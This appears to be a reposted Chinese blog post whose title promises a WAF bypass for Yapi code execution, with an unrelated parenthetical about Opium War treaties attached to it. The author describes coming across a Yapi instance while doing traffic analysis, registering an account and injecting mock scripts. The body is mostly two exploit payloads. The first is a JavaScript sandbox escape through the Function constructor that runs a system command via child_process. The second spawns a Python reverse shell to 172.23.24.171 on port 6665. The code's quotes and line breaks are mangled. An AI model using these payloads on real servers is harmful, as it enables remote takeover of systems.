Yapi 代码执行waf绕过小技巧(鸦片战争签订的条约)

网友投稿 303 2022-10-04


Yapi 代码执行waf绕过小技巧(鸦片战争签订的条约)

疫情在家办公,这时接到boss的电话说要做一个流量分析,老板发话干就干。对恶意告警分析差不多了,没事翻一翻流量,结果意外发现一个大宝贝!就这样开始了与Yapi的美丽邂逅。

高兴之余赶紧注册账户,写入恶意脚本。

const sandbox = thisconst ObjectConstructor = this.constructorconst FunctionConstructor = ObjectConstructor.constructorconst myfun = FunctionConstructor('return process')const process = myfun()mockJson = process.mainModule.require("child_process").execSync(“whoami”)

最后的脚本

const sandbox = thisconst ObjectConstructor = this.constructorconst FunctionConstructor = ObjectConstructor.constructorconst myfun = FunctionConstructor('return process')const process = myfun()Poc=process.mainModule.require("child_process").spawnSync(‘python’[‘c’,’'importsocket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("172.23.24.171",6665));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'’])


版权声明:本文内容由网络用户投稿,版权归原作者所有,本站不拥有其著作权,亦不承担相应法律责任。如果您发现本站中有涉嫌抄袭或描述失实的内容,请联系我们jiasou666@gmail.com 处理,核实后本网站将在24小时内删除侵权内容。

标签:api mock
上一篇:全球通信基础设施面临 APT、机器人、DDoS;移动网络最弱(全球通信基础设施面临的问题)
下一篇:Java实现文件夹中内容定时删除
相关文章

 发表评论

暂时没有评论,来抢沙发吧~